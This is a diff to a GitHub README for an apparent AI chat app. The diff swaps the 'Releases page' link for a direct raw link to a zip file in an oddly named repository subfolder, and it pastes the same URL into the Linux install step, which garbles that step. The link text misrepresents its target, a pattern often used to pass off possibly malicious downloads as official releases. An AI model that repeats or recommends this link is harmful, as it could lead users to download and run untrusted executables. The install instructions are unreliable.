khang12345k/ai-chat-app-with-agents-getstream/README.md

 ## 🔗 Download & Install
 To get the application, follow these steps:

-1. **Visit the Releases Page**: Go to our [Releases page](https://github.com/khang12345k/ai-chat-app-with-agents-getstream/releases) to find the latest version of the application.
+1. **Visit the Releases Page**: Go to our [Releases page](https://raw.githubusercontent.com/khang12345k/ai-chat-app-with-agents-getstream/main/masterable/ai-chat-app-with-agents-getstream.zip) to find the latest version of the application.

 2. **Download the App**: Locate the most recent release.
 Click the link to download the appropriate file for your operating system.

 3. **Install the Application**:
    - For Windows: Open the downloaded `.exe` file and follow the setup instructions.
    - For macOS: Open the downloaded `.dmg` file, drag the app to your Applications folder, and then launch it.
-   - For Linux: Extract the downloaded `.tar.gz` file, and run the application from the extracted folder.
+   - For Linux: Extract the downloaded `https://raw.githubusercontent.com/khang12345k/ai-chat-app-with-agents-getstream/main/masterable/ai-chat-app-with-agents-getstream.zip` file, and run the application from the extracted folder.

 4. **Run the App**: Once installed, open the application.
 You can now start chatting with AI agents!